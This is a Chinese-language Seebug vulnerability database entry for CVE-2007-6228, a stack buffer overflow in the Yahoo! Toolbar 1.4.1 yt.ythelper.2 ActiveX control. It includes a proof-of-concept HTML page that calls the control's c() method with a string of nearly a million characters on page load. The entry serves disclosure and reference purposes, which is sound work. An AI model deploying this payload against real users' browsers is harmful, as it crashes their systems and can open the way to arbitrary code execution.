Lucene search
RootSSV:26001HistoryDec 02, 2011 - 12:00 a.m.
Yahoo! Toolbar yt.ythelper.2 ActiveX控件栈溢出漏洞
2011-12-0200:00:00
Root
www.seebug.org
13
0.537 Medium
EPSS
Percentile
97.6%
BUGTRAQ ID: 26656
CVE(CAN) ID: CVE-2007-6228
Yahoo! Toolbar是一个IE插件,能够通过嵌入IE的工具栏帮助快速使用Yahoo搜索引擎、收发Yahoo电子邮件等操作。
Yahoo! Toolbar的ActiveX控件实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。
Yahoo! Toolbar所安装的yt.ythelper.2 ActiveX控件没有正确地验证对c()方式所传送的参数,如果用户受骗访问了恶意网页并向该方式传送了超长参数的话,就可能触发栈溢出,导致浏览器崩溃或执行任意指令。
Yahoo! Toolbar 1.4.1
厂商补丁:
Yahoo!
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = "AAAA";
while (s.length < 999999) s=s+s;
var obj = new ActiveXObject("yt.ythelper.2"); //{02478D38-C3F9-4EFB-9B51-7695ECA05670}
obj.c(s);
}
</script>
</head>
<body onload="JavaScript: return Check();">
</body>
</html>
Related
nvd
nvd
CVE-2007-6228
2007-12-04 18:46:00
checkpoint_advisories
checkpoint_advisories
Yahoo Toolbar ActiveX Control Stack Buffer Overflow - Ver2 (CVE-2007-6228)
2014-03-03 00:00:00
prion
prion
Stack overflow
2007-12-04 18:46:00
cve
cve
CVE-2007-6228
2007-12-04 18:46:00
cvelist
cvelist
CVE-2007-6228
2007-12-04 18:00:00